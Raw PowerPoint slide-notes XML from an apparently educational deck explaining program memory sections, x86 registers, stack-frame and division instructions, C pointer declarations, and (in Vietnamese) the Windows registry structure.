                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This term can be used to refer to a specific section of memory called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>data section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, which contains values that are put in place when a program is initially loaded. These values are sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>values because they may not change while the program is running, or they may be called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>values because they are available to any part of the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does and how the program’s tasks will be orchestrated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The heap is used for dynamic memory during program execution, to create (allocate) new values and eliminate (free) values that the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>no longer needs. The heap is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dynamic memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>because its contents can change frequently while the program is running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The stack is used for local variables and parameters for functions, and to help control program flow. </a:t>
            </a:r>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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939410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1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. General registers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>are used by the CPU during execution (AX: accumulator; DX: double word accumulator; CX: counter; BX: base register; SI-DI: source-destination index).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Segment registers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>are used to track sections of memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Status flags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>are used to make decisions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Instruction pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>are used to keep track of the next instruction to execute.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1E03A334-FE4D-4C3E-A61B-575B8EC3A56A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2435859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Enter: setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a new stack frame for a procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Leave: used at the end of the procedure (just before the RET instruction) to release the stack frame (pop EBP off, set ESP = EBP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Ret: return the calling function (pop Return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> EIP)</a:t>
            </a:r>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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2780278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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4169900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performing the div or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> instruction, you are dividing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>edx:eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> by the operand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>and storing the result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> and the remainder in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Cdq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
              <a:t> =&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>edx:eax</a:t>
            </a:r>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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="522222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LPINT</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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) [50]: a pointer to an array of 50 long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> values.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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)[50]: a pointer to an array of pointers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> of 50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[2])[5]: a array of 2 pointers, each pointer to an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> array of 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> values.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177157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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1207722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Thanh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> chia 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gốc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: root key (HKEY) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> con (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>subkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khóa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (key): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> thanh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> trị</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (value entry): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cặp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> trị]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> trị (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> liệu): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
